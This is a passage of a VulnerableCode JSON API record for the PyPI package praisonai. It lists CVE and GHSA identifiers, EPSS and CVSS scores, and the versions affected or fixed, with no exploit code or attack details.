esource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40115","GHSA-2xgv-5cv2-47vv"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wuve-58em-sqas"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/329916?format=json","vulnerability_id":"VCID-x2qs-qxtq-4fax","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34936","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02855","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34936"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x6m9-gxvr-7jpv","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-06T15:35:46Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x6m9-gxvr-7jpv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34936","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34936"},{"reference_url":"https://github.com/advisories/GHSA-x6m9-gxvr-7jpv","reference_id":"GHSA-x6m9-gxvr-7jpv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x6m9-gxvr-7jpv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/189024?format=json","purl":"pkg:pypi/praisonai@4.5.90","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-42xt-269j-m3hw"},{"vulnerability":"VCID-5f3z-55fe-7kh7"},{"vulnerability":"VCID-5x3f-r7ft-3ke4"},{"vulnerability":"VCID-78hn-811u-1fgg"},{"vulnerability":"VCID-7fza-phhr-1ffb"},{"vulnerability":"VCID-9bnf-71rn-77e9"},{"vulnerability":"VCID-as2k-h8e6-2bbg"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-bm8e-na69-2qhr"},{"vulnerability":"VCID-ceav-utcz-33fc"},{"vulnerability":"VCID-e9s4-2q39-97bu"},{"vulnerability":"VCID-gtfg-wf6b-p7et"},{"vulnerability":"VCID-hby8-eypb-3ubk"},{"vulnerability":"VCID-k8kd-r72v-d7hd"},{"vulnerability":"VCID-kqsn-x28j-8bds"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-m1vr-ksyx-ebh1"},{"vulnerability":"VCID-m23z-e1es-byhy"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-mq2r-dw6g-77fx"},{"vulnerability":"VCID-mwe3-4jct-jqhk"},{"vulnerability":"VCID-qg8p-cewa-6khr"},{"vulnerability":"VCID-rymq-5dgd-t7g2"},{"vulnerability":"VCID-seay-h824-kug9"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-w65u-12gv-cud4"},{"vulnerability":"VCID-wuve-58em-sqas"},{"vulnerability":"VCID-xdc3-v772-zbf4"},{"vulnerability":"VCID-zmma-2kzw-7bc8"},{"vulnerability":"VCID-zwad-4gjg-e3e2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.90"}],"aliases":["CVE-2026-34936","GHSA-x6m9-gxvr-7jpv"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x2qs-qxtq-4fax"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/332728?format=json","vulnerability_id":"VCID-xdc3-v772-zbf4","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41497","reference_id":"","reference_type":"","scores":[{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28047","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41497"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/commit/47bff65413beaa3c21bf633c1fae4e684348368c","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-08T14:47:18Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/commit/47bff65413beaa3c21bf633c1fae4e684348368c"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9qhq-v63v-fv3j","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-08T14:47:18Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9qhq-v63v-fv3j"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34935","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34935"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41497","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41497"},{"reference_url":"https://github.com/advisories/GHSA-9qhq-v63v-fv3j","reference_id":"GHSA-9qhq-v63v-fv3j","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9qhq-v63v-fv3j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188936?format=json","purl":"pkg:pypi/praisonai@4.5.149","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.149"}],"aliases":["CVE-2026-41497","GHSA-9qhq-v63v-fv3j"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xdc3-v772-zbf4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/331864?format=json","vulnerability_id":"VCID-zmma-2kzw-7bc8","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40114","reference_id":"","reference_type":"","scores":[{"value":"0.00063","scoring_system":"epss","scoring_elements":"0.19926","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40114"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8frj-8q3m-xhgm","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:38:35Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8frj-8q3m-xhgm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40114","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40114"},{"reference_url":"https://github.com/advisories/GHSA-8frj-8q3m-xhgm","reference_id":"GHSA-8frj-8q3m-xhgm","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8frj-8q3m-xhgm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188386?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-xdc3-v772-zbf4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40114","GHSA-8frj-8q3m-xhgm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zmma-2kzw-7bc8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/331863?format=json","vulnerability_id":"VCID-zwad-4gjg-e3e2","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40113","reference_id":"","reference_type":"","scores":[{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10686","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40113"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-fvxx-ggmx-3cjg","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T18:13:03Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-fvxx-ggmx-3cjg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40113","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40113"},{"reference_url":"https://github.com/advisories/GHSA-fvxx-ggmx-3cjg","reference_id":"GHSA-fvxx-ggmx-3cjg","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fvxx-ggmx-3cjg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188386?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-xdc3-v772-zbf4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40113","GHSA-fvxx-ggmx-3cjg"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zwad-4gjg-e3e2"}],"fixing_vulnerabilities":[],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@0.0.74"}